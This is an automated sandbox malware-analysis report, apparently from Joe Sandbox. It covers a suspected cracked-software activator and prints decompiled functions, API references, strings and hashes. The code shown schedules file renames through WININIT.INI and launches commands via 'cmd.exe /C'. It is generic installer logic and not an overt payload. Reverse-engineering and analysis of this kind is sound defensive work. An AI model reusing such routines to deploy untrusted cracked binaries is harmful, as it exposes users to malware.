0x0046499e
0x0046499e
0x0046499c
0x00464976
0x004649a2
0x004649a5
0x004649a7
0x004649a9
0x004649b0
0x004649b3
0x004649c5
0x004649ca
0x004649cc
0x004649ce
0x004649d2
0x004649d4
0x004649d4
0x004649d4
0x004649d4
0x004649d2
0x004649cc
0x0046467b
0x0046467b
0x0046467e
0x004648a3
0x004648a6
0x004648a9
0x004648ad
0x004648b3
0x004648b7
0x004648c3
0x004648c8
0x004648cc
0x004648cf
0x004648d7
0x004648e0
0x004648ec
0x004648ec
0x004648f2
0x004648f6
0x00464902
0x00464907
0x00464911
0x0046491c
0x0046492a
0x00464932
0x0046493f
0x00464943
0x0046494a
0x0046494b
0x00464953
0x00464953
0x004648f6
0x004648b7
0x00464684
0x00464684
0x00464685
0x00464887
0x0046488a
0x0046488e
0x00464894
0x00464894
0x0046468b
0x0046468c
0x004646bf
0x004646bf
0x0046468c
0x00464685
0x0046467e
0x004649d8
0x004649da
0x004649dd
0x004649e0
0x004649ed
0x004649ed
0x0046466d

APIs

LoadCursorA.USER32 ref: 00464738
SetCursor.USER32(00000000,00000000,00007F02,00000000,004647CD), ref: 0046473E
SetCursor.USER32(?,004647B5,00007F02,00000000,004647CD), ref: 004647A8

Strings

, xrefs: 004649CE
, xrefs: 004649B3
Internal error: Item already expanding, xrefs: 004646D5

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Cursor$Load
String ID: $ $Internal error: Item already expanding
API String ID: 1675784387-1948079669
Opcode ID: f0d8b3a22494a668e36ff372e63dbf03653d2e1c551dd02a847e0882ae5da109
Instruction ID: 9cbbcba472df96bd09ce797c5f765fac8c2f652b56477a68fde2327aac6a5f51
Opcode Fuzzy Hash: f0d8b3a22494a668e36ff372e63dbf03653d2e1c551dd02a847e0882ae5da109
Instruction Fuzzy Hash: 8CB1C174600604DFDB20DF65C585B9BBBF0AF85308F1580ABE8459B792E778ED44CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 0045452C Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0045452C(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v41;
				char _v48;
				char _v52;
				void* __ecx;
				void* _t90;
				void* _t151;
				void* _t176;
				char _t178;
				intOrPtr _t180;
				intOrPtr _t188;
				intOrPtr _t195;
				intOrPtr _t219;
				intOrPtr _t229;
				intOrPtr _t230;

				_t227 = __esi;
				_t226 = __edi;
				_t229 = _t230;
				_t180 = 5;
				goto L1;
				L4:
				if(E0042E084(_t90) != 0) {
					if(_t176 == 0) {
						E00454330(_v8, _t176, _t181,  &_v48, _t226, _t227);
						E00403494( &_v8, _v48);
						if(_v12 != 0) {
							E00454330(_v12, _t176, _t181,  &_v48, _t226, _t227);
							E00403494( &_v12, _v48);
						}
					}
					if(E004534DC(_t176, _v12, _v8, 5) == 0) {
						E00453C98("MoveFileEx");
					}
					_pop(_t195);
					 *[fs:eax] = _t195;
					_push(E00454869);
					E00403420( &_v52, 2);
					E00403420( &_v40, 2);
					return E00403420( &_v24, 5);
				} else {
					E0042DD28( &_v16);
					E0042C88C(_v16,  &_v48);
					E004035C0( &_v20, "WININIT.INI", _v48);
					E00453FAC(0, _t176, 0x45488c, _v16, _t226, _t227,  &_v24);
					_push(_t229);
					_push(0x4547c1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t230;
					_v28 = 0;
					_v32 = 0;
					_push(_t229);
					_push(0x45476b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t230;
					WritePrivateProfileStringA(0, 0, 0, E00403738(_v20));
					_v28 = E00450F04(1, 1, 0, 3);
					_t188 = _v24;
					_v32 = E00450F04(1, 0, 1, 0);
					_v41 = 0;
					while(E00451198(_v28) == 0) {
						E004511A8(_v28,  &_v36);
						_t178 = 1;
						E00407040(_v36,  &_v40);
						if(_v40 == 0 ||  *_v40 != 0x5b) {
							L11:
							E00451390(_v32, _t178, _t188, _v36, _t226, _t227);
							_t178 = 0;
							continue;
						} else {
							if(E00406F54(_v40, "[rename]") != 0) {
								if(_v41 == 0) {
									goto L11;
								}
							} else {
								_v41 = 1;
								goto L11;
							}
						}
						break;
					}
					if(_v41 == 0) {
						E00451390(_v32, _t178, _t188, "[rename]", _t226, _t227);
					}
					if(_v12 == 0) {
						E00403494( &_v40, 0x4548b0);
					} else {
						E0042DCD4(_v12, _t188,  &_v40);
					}
					E00403494( &_v48, _v40);
					E0040357C( &_v48, 0x4548bc);
					_push( &_v48);
					E0042DCD4(_v8, _t188,  &_v52);
					_pop(_t151);
					E0040357C(_t151, _v52);
					E00451390(_v32, _t178, _t188, _v48, _t226, _t227);
					if(_t178 != 0) {
						E00451390(_v32, _t178, _t188, _v36, _t226, _t227);
					}
					while(E00451198(_v28) == 0) {
						E004511A8(_v28,  &_v36);
						E00451390(_v32, _t178, _t188, _v36, _t226, _t227);
					}
					_pop(_t219);
					 *[fs:eax] = _t219;
					_push(E00454772);
					E00402B58(_v32);
					return E00402B58(_v28);
				}
				L1:
				_push(0);
				_push(0);
				_t180 = _t180 - 1;
				if(_t180 != 0) {
					goto L1;
				} else {
					_push(_t180);
					_t1 =  &_v8;
					_t181 =  *_t1;
					 *_t1 = _t180;
					_push(__esi);
					_push(__edi);
					_v12 =  *_t1;
					_v8 = __edx;
					_t176 = __eax;
					E00403728(_v8);
					E00403728(_v12);
					_push(_t229);
					_push(0x454862);
					_push( *[fs:eax]);
					 *[fs:eax] = _t230;
					E0042CC94(_v8,  &_v48);
					_t90 = E00403494( &_v8, _v48);
					if(_v12 != 0) {
						E0042CC94(_v12,  &_v48);
						_t90 = E00403494( &_v12, _v48);
					}
				}
				goto L4;
			}

0x0045452c
0x0045452c
0x0045452d
0x00454530
0x00454530
0x0045459b
0x004545a2
0x004547dc
0x004547e4
0x004547ef
0x004547f8
0x00454800
0x0045480b
0x0045480b
0x004547f8
0x00454821
0x00454828
0x00454828
0x0045482f
0x00454832
0x00454835
0x00454842
0x0045484f
0x00454861
0x004545a8
0x004545ab
0x004545b6
0x004545c6
0x004545d9
0x004545e0
0x004545e1
0x004545e6
0x004545e9
0x004545ee
0x004545f3
0x004545f8
0x004545f9
0x004545fe
0x00454601
0x00454613
0x0045462d
0x00454636
0x00454645
0x00454648
0x004546a0
0x00454656
0x0045465b
0x00454663
0x0045466c
0x00454693
0x00454699
0x0045469e
0x00000000
0x00454676
0x00454685
0x00454691
0x00000000
0x00000000
0x00454687
0x00454687
0x00000000
0x00454687
0x00454685
0x00000000
0x0045466c
0x004546b0
0x004546ba
0x004546ba
0x004546c3
0x004546da
0x004546c5
0x004546cb
0x004546cb
0x004546e5
0x004546f2
0x004546fa
0x00454701
0x00454709
0x0045470a
0x00454715
0x0045471c
0x00454724
0x00454724
0x00454741
0x00454731
0x0045473c
0x0045473c
0x0045474f
0x00454752
0x00454755
0x0045475d
0x0045476a
0x0045476a
0x00454535
0x00454535
0x00454537
0x00454539
0x0045453a
0x00000000
0x0045453c
0x0045453c
0x0045453d
0x0045453d
0x0045453d
0x00454541
0x00454542
0x00454543
0x00454546
0x00454549
0x0045454e
0x00454556
0x0045455d
0x0045455e
0x00454563
0x00454566
0x0045456f
0x0045457a
0x00454583
0x0045458b
0x00454596
0x00454596
0x00454583
0x00000000

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00454613

Strings

MoveFileEx, xrefs: 00454823
NUL, xrefs: 004546D5
WININIT.INI, xrefs: 004545C1
[rename], xrefs: 00454676, 004546B2
.tmp, xrefs: 004545CF

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
API String ID: 390214022-3304407042
Opcode ID: fc2f0a429556627ddf5cabc681d984d0c75af6d26db071d07ca7a7ecd82d7856
Instruction ID: c5648654d35dc4fa5992192bdfac3c74e0b4d15883e79a195514524b6fb94f40
Opcode Fuzzy Hash: fc2f0a429556627ddf5cabc681d984d0c75af6d26db071d07ca7a7ecd82d7856
Instruction Fuzzy Hash: D1912334A001099BDB01EFA5D841BDEB7F5EF89309F508467E900BB692D778AE49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00408BB0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00408BB0(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t148;
				intOrPtr _t156;

				_t153 = __esi;
				_t152 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(__esi);
				_push(__edi);
				_push(_t156);
				_push(0x408df8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t156;
				_t104 = GetSystemDefaultLCID();
				E004089F8(_t31, 0, 0x14,  &_v16);
				E00403450(0x49e49c, _t104, _v16, __edi, __esi);
				E004089F8(_t104, 0x408e10, 0x1b,  &_v16);
				 *0x49e4a0 = E00407264(0x408e10, 0);
				E004089F8(_t104, 0x408e10, 0x1c,  &_v16);
				 *0x49e4a1 = E00407264(0x408e10, 0);
				 *0x49e4a2 = E00408A44(_t104, 0x2c, 0xf);
				 *0x49e4a3 = E00408A44(_t104, 0x2e, 0xe);
				E004089F8(_t104, 0x408e10, 0x19,  &_v16);
				 *0x49e4a4 = E00407264(0x408e10, 0);
				 *0x49e4a5 = E00408A44(_t104, 0x2f, 0x1d);
				E004089F8(_t104, "m/d/yy", 0x1f,  &_v16);
				E00403450(0x49e4a8, _t104, _v16, _t152, _t153);
				E004089F8(_t104, "mmmm d, yyyy", 0x20,  &_v16);
				E00403450(0x49e4ac, _t104, _v16, _t152, _t153);
				 *0x49e4b0 = E00408A44(_t104, 0x3a, 0x1e);
				E004089F8(_t104, 0x408e44, 0x28,  &_v16);
				E00403450(0x49e4b4, _t104, _v16, _t152, _t153);
				E004089F8(_t104, 0x408e50, 0x29,  &_v16);
				E00403450(0x49e4b8, _t104, _v16, _t152, _t153);
				E004089F8(_t104, 0x408e10, 0x25,  &_v16);
				if(E00407264(0x408e10, 0) != 0) {
					E00403494( &_v8, 0x408e68);
				} else {
					E00403494( &_v8, 0x408e5c);
				}
				E004089F8(_t104, 0x408e10, 0x23,  &_v16);
				if(E00407264(0x408e10, 0) != 0) {
					E00403400( &_v12);
				} else {
					E00403494( &_v12, 0x408e74);
				}
				_push(_v8);
				_push(":mm");
				_push(_v12);
				E00403634();
				_push(_v8);
				_push(":mm:ss");
				_push(_v12);
				E00403634();
				_pop(_t148);
				 *[fs:eax] = _t148;
				_push(E00408DFF);
				return E00403420( &_v16, 3);
			}

0x00408bb0
0x00408bb0
0x00408bb3
0x00408bb5
0x00408bb7
0x00408bba
0x00408bbb
0x00408bbe
0x00408bbf
0x00408bc4
0x00408bc7
0x00408bcf
0x00408bde
0x00408beb
0x00408c00
0x00408c0f
0x00408c24
0x00408c33
0x00408c46
0x00408c59
0x00408c6e
0x00408c7d
0x00408c90
0x00408ca5
0x00408cb2
0x00408cc7
0x00408cd4
0x00408ce7
0x00408cfc
0x00408d09
0x00408d1e
0x00408d2b
0x00408d40
0x00408d51
0x00408d6a
0x00408d53
0x00408d5b
0x00408d5b
0x00408d7f
0x00408d90
0x00408da4
0x00408d92
0x00408d9a
0x00408d9a
0x00408da9
0x00408dac
0x00408db1
0x00408dbe
0x00408dc3
0x00408dc6
0x00408dcb
0x00408dd8
0x00408ddf
0x00408de2
0x00408de5
0x00408df7

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00408DF8,?,?,?,?,00000000,00000000,00000000,?,00409DFF,00000000,00409E12), ref: 00408BCA

Part of subcall function 004089F8: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049E4C4,00000001,?,00408AC3,?,00000000,00408BA2), ref: 00408A16

Part of subcall function 00408A44: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00408C46,?,?,?,00000000,00408DF8), ref: 00408A57

Strings

mmmm d, yyyy, xrefs: 00408CBB
:mm, xrefs: 00408DAC
:mm:ss, xrefs: 00408DC6
m/d/yy, xrefs: 00408C99
AMPM, xrefs: 00408D95

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 9a7eb394a66080edfd24f68117555f400a3e3cdfc1c474aefde3fc5f2e1ccb78
Instruction ID: 6e389ecbf5aa42e5faf75f2f0cdd2dfe5a993f3520af0ea01b43abf2a46df86b
Opcode Fuzzy Hash: 9a7eb394a66080edfd24f68117555f400a3e3cdfc1c474aefde3fc5f2e1ccb78
Instruction Fuzzy Hash: 20514E34B00148ABDB01EBAAC94169E676ADB98308F50947FB091BB7C7CE3CDA05975D

Uniqueness

Uniqueness Score: -1.00%

Function 00411B84 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00411B84(void* __eax, void* __ebx, struct HMENU__* __edx, void* __edi, intOrPtr __esi) {
				char _v8;
				struct tagMENUITEMINFOA _v52;
				char _v56;
				intOrPtr _t91;
				CHAR* _t97;
				short _t128;
				void* _t132;
				intOrPtr _t139;
				struct HMENU__* _t159;
				int _t163;
				void* _t167;
				void* _t171;

				_t160 = __esi;
				_push(__esi);
				_push(__edi);
				_v56 = 0;
				_v8 = 0;
				_t159 = __edx;
				_t132 = __eax;
				_push(_t167);
				_push(0x411d89);
				_push( *[fs:eax]);
				 *[fs:eax] = _t167 + 0xffffffcc;
				if( *((char*)(__eax + 0x2c)) == 0) {
					L15:
					_pop(_t139);
					 *[fs:eax] = _t139;
					_push(E00411D90);
					E00403400( &_v56);
					return E00403400( &_v8);
				}
				E00403494( &_v8,  *((intOrPtr*)(__eax + 0x20)));
				if(E0041212C(_t132) <= 0) {
					__eflags =  *((short*)(_t132 + 0x40));
					if( *((short*)(_t132 + 0x40)) == 0) {
						L8:
						_t171 = (GetVersion() & 0x000000ff) - 4;
						if(_t171 < 0) {
							_t163 =  *(0x49c294 + ((E00403684( *((intOrPtr*)(_t132 + 0x20)), E00411DAC) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0049C288 |  *0x0049C278 |  *0x0049C280 | 0x00000400;
							_t91 = E0041212C(_t132);
							__eflags = _t91;
							if(_t91 <= 0) {
								InsertMenuA(_t159, 0xffffffff, _t163,  *(_t132 + 0x30) & 0x0000ffff, E00403738(_v8));
							} else {
								_t97 = E00403738( *((intOrPtr*)(_t132 + 0x20)));
								InsertMenuA(_t159, 0xffffffff, _t163 | 0x00000010, E00411F3C(_t132, _t159, _t163), _t97);
							}
						} else {
							_v52.cbSize = 0x2c;
							_v52.fMask = 0x3f;
							_v52.fType =  *(0x49c2c8 + ((E00403684( *((intOrPtr*)(_t132 + 0x20)), E00411DAC) & 0xffffff00 | _t171 == 0x00000000) & 0x0000007f) * 4) |  *0x0049C2C0 |  *0x0049C29C;
							_v52.fState =  *0x0049C2A8 |  *0x0049C2B8 |  *0x0049C2B0;
							_v52.wID =  *(_t132 + 0x30) & 0x0000ffff;
							_v52.hSubMenu = 0;
							_v52.hbmpChecked = 0;
							_v52.hbmpUnchecked = 0;
							_v52.dwTypeData = E00403738(_v8);
							if(E0041212C(_t132) > 0) {
								_v52.hSubMenu = E00411F3C(_t132, _t159, _t160);
							}
							InsertMenuItemA(_t159, 0xffffffff, 1,  &_v52);
						}
						goto L15;
					}
					_t160 =  *((intOrPtr*)(_t132 + 0x44));
					__eflags = _t160;
					if(_t160 == 0) {
						L7:
						_push(_v8);
						_push(0x411da0);
						E00411568( *((intOrPtr*)(_t132 + 0x40)), _t132, 0,  &_v56, _t159, _t160);
						_push(_v56);
						E00403634();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t160 + 0x44));
					if( *((intOrPtr*)(_t160 + 0x44)) != 0) {
						goto L7;
					}
					_t128 = E00402BA0( *((intOrPtr*)(_t160 + 4)), 0x411258);
					__eflags = _t128;
					if(_t128 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v52.hSubMenu = E00411F3C(_t132, _t159, __esi);
				goto L8;
			}

0x00411b84
0x00411b8b
0x00411b8c
0x00411b8f
0x00411b92
0x00411b95
0x00411b97
0x00411b9b
0x00411b9c
0x00411ba1
0x00411ba4
0x00411bab
0x00411d6b
0x00411d6d
0x00411d70
0x00411d73
0x00411d7b
0x00411d88
0x00411d88
0x00411bb7
0x00411bc5
0x00411bd3
0x00411bd8
0x00411c1c
0x00411c25
0x00411c29
0x00411d24
0x00411d2c
0x00411d31
0x00411d33
0x00411d66
0x00411d35
0x00411d38
0x00411d4d
0x00411d4d
0x00411c2f
0x00411c2f
0x00411c36
0x00411c71
0x00411c98
0x00411c9f
0x00411ca4
0x00411ca9
0x00411cae
0x00411cb9
0x00411cc5
0x00411cce
0x00411cce
0x00411cda
0x00411cda
0x00000000
0x00411c29
0x00411bda
0x00411bdd
0x00411bdf
0x00411bf8
0x00411bf8
0x00411bfb
0x00411c07
0x00411c0c
0x00411c17
0x00000000
0x00411c17
0x00411be1
0x00411be5
0x00000000
0x00000000
0x00411bef
0x00411bf4
0x00411bf6
0x00000000
0x00000000
0x00000000
0x00411bf6
0x00411bce
0x00000000

APIs

GetVersion.KERNEL32(00000000,00411D89), ref: 00411C1C
InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411CDA

Part of subcall function 00411F3C: CreatePopupMenu.USER32(?,00411D45,00000000,00000000,00411D89), ref: 00411F56

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00411D66

Part of subcall function 00411F3C: CreateMenu.USER32(?,00411D45,00000000,00000000,00411D89), ref: 00411F60

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 00411D4D

Strings

?, xrefs: 00411C36
,, xrefs: 00411C2F

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 2e8e8ea7aa81c0bb070b735559dd4681aa84df17034fe18f9a62e23080711f87
Instruction ID: 3fb5e0cd3bdc3201fae72ff24864c2251e092a1c83a82613ff871d7f09dca240
Opcode Fuzzy Hash: 2e8e8ea7aa81c0bb070b735559dd4681aa84df17034fe18f9a62e23080711f87
Instruction Fuzzy Hash: 82510674A00145ABDB10EF7ADD816DA7BF9AB09304F21417BFA04E73A6E738D941CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0045580C Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0045580C(char __eax, void* __ebx, char __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, short _a12, intOrPtr _a16, char _a20) {
				char _v5;
				char _v12;
				short _v32;
				intOrPtr _v36;
				char _v80;
				void* _v92;
				char _v96;
				char _v100;
				char _v104;
				intOrPtr _t59;
				void* _t69;
				signed int _t75;
				char _t105;
				intOrPtr _t125;
				void* _t135;
				intOrPtr* _t137;
				void* _t140;

				_t109 = __ecx;
				_v100 = 0;
				_v104 = 0;
				_v12 = 0;
				_t105 = __ecx;
				_t135 = __edx;
				_v5 = __eax;
				_t137 = _a4;
				E00403728(_a20);
				_push(_t140);
				_push(0x455a02);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140 + 0xffffff9c;
				E00403684(_t135, 0x455a1c);
				if(0 != 0) {
					_push(0x455a28);
					_push(_t135);
					_push(0x455a28);
					E00403634();
					__eflags = _t105;
					if(__eflags != 0) {
						_push(_v12);
						_push(0x455a34);
						_push(_t105);
						E00403634();
					}
					E0042CD8C(_t135, _t109,  &_v100, __eflags);
					__eflags = E00406F54(_v100, 0x455a40);
					if(__eflags == 0) {
						L6:
						_t59 = E0042E084(_t58);
						__eflags = _t59;
						if(_t59 == 0) {
							_push(0x455a28);
							E0042DD28( &_v104);
							E0042C88C(_v104,  &_v100);
							_push(_v100);
							_push("COMMAND.COM\" /C ");
							_push(_v12);
							E00403634();
						} else {
							_push(0x455a28);
							E0042DD54( &_v104);
							E0042C88C(_v104,  &_v100);
							_push(_v100);
							_push("cmd.exe\" /C \"");
							_push(_v12);
							_push(0x455a28);
							E00403634();
						}
						goto L9;
					} else {
						E0042CD8C(_t135, _t109,  &_v100, __eflags);
						_t58 = E00406F54(_v100, 0x455a50);
						__eflags = _t58;
						if(_t58 != 0) {
							L9:
							__eflags = _a20;
							if(_a20 == 0) {
								E0042CD34(_t135, _t109,  &_a20);
							}
							goto L11;
						}
						goto L6;
					}
				} else {
					E00403494( &_v12, _t105);
					L11:
					E00402934( &_v80, 0x44);
					_v80 = 0x44;
					_v36 = 1;
					_v32 = _a12;
					_t143 = _a20;
					if(_a20 == 0) {
						E0042DD54( &_a20);
					}
					_t69 = E00403738(_a20);
					_t75 = E00452FC0(_v5, E00403738(_v12), 0, _t143,  &_v96,  &_v80, _t69, 0, 0x4000000, 0, 0, 0);
					asm("sbb ebx, ebx");
					_t108 =  ~( ~_t75);
					if( ~( ~_t75) != 0) {
						CloseHandle(_v92);
						E00455778(_v96, _t108, _a16, _t135, _t137, _t137);
					} else {
						 *_t137 = GetLastError();
					}
					_pop(_t125);
					 *[fs:eax] = _t125;
					_push(E00455A09);
					E00403420( &_v104, 2);
					E00403400( &_v12);
					return E00403400( &_a20);
				}
			}

0x0045580c
0x00455817
0x0045581a
0x0045581d
0x00455820
0x00455822
0x00455824
0x00455827
0x0045582d
0x00455834
0x00455835
0x0045583a
0x0045583d
0x00455847
0x0045584c
0x0045585d
0x00455862
0x00455863
0x00455870
0x00455875
0x00455877
0x00455879
0x0045587c
0x00455881
0x0045588a
0x0045588a
0x00455894
0x004558a6
0x004558a8
0x004558c5
0x004558c5
0x004558ca
0x004558cc
0x00455905
0x0045590d
0x00455918
0x0045591d
0x00455920
0x00455925
0x00455930
0x004558ce
0x004558ce
0x004558d6
0x004558e1
0x004558e6
0x004558e9
0x004558ee
0x004558f1
0x004558fe
0x004558fe
0x00000000
0x004558aa
0x004558af
0x004558bc
0x004558c1
0x004558c3
0x00455935
0x00455935
0x00455939
0x00455940
0x00455940
0x00000000
0x00455939
0x00000000
0x004558c3
0x0045584e
0x00455853
0x00455945
0x0045594f
0x00455954
0x0045595b
0x00455966
0x0045596a
0x0045596e
0x00455973
0x00455973
0x00455988
0x004559a5
0x004559ae
0x004559b0
0x004559b4
0x004559c3
0x004559d2
0x004559b6
0x004559bb
0x004559bb
0x004559d9
0x004559dc
0x004559df
0x004559ec
0x004559f4
0x00455a01
0x00455a01

APIs

GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455A28,00455A28,?,00455A28,00000000), ref: 004559B6
CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455A28,00455A28,?,00455A28), ref: 004559C3

Part of subcall function 00455778: WaitForInputIdle.USER32 ref: 004557A4
Part of subcall function 00455778: MsgWaitForMultipleObjects.USER32 ref: 004557C6
Part of subcall function 00455778: GetExitCodeProcess.KERNEL32 ref: 004557D5
Part of subcall function 00455778: CloseHandle.KERNEL32(?,00455802,004557FB,?,?,?,00000000,?,?,004559D7,?,?,?,00000044,00000000,00000000), ref: 004557F5

Strings

.cmd, xrefs: 004558B7
COMMAND.COM" /C , xrefs: 00455920
.bat, xrefs: 0045589C
cmd.exe" /C ", xrefs: 004558E9
D, xrefs: 00455954

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
API String ID: 854858120-615399546
Opcode ID: 3e4b0a1e103b7e8cb717b0e50394771715c1b6074b695854dfd9f18dc896e6e2
Instruction ID: 0bf838f29b43a6125692e3b7c5bec048a51817b33ba316f47a5a27346a6aee42
Opcode Fuzzy Hash: 3e4b0a1e103b7e8cb717b0e50394771715c1b6074b695854dfd9f18dc896e6e2
Instruction Fuzzy Hash: 34518B7060074DABDB00EF95D892BEEBBB9AF44305F50453BB804B7292D77C5E098759

Uniqueness

Uniqueness Score: -1.00%

Function 0041C2F3 Relevance: 10.7, APIs: 7, Instructions: 153
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041C2F3(signed int __ebx, void* __edi) {
				struct HINSTANCE__* _t118;
				signed int _t125;
				signed int _t127;
				long _t132;
				void* _t134;
				void* _t140;
				intOrPtr _t150;
				signed int _t154;
				void* _t158;
				BYTE* _t159;
				BYTE* _t162;
				signed int _t164;
				void* _t166;
				intOrPtr _t167;

				_t158 = __edi;
				_t127 = __ebx | 0xffffffff;
				 *(_t166 - 0x20) = 0;
				_t134 =  *((intOrPtr*)(_t166 - 0xc)) - 1;
				if(_t134 < 0) {
					L10:
					if(_t127 == 0xffffffff) {
						_t127 = 0;
					}
					 *((intOrPtr*)(_t166 - 0x44)) =  *((intOrPtr*)(_t166 - 0x10)) + (_t127 + _t127) * 8;
					 *((intOrPtr*)(_t166 - 0x30)) = E00406E6C( *((intOrPtr*)( *((intOrPtr*)(_t166 - 0x44)) + 8)),  *((intOrPtr*)(_t166 - 0x10)), _t158, 0);
					 *[fs:eax] = _t167;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 - 4)))) + 8))( *[fs:eax], 0x41c4a8, _t166);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 - 4))))))();
					E0041C048( *((intOrPtr*)(_t166 - 0x30)),  *((intOrPtr*)(_t166 - 0x30)), _t166 - 0x3c, _t166 - 0x38,  *((intOrPtr*)( *((intOrPtr*)(_t166 - 4)))), 0);
					GetObjectA( *(_t166 - 0x3c), 0x18, _t166 - 0x74);
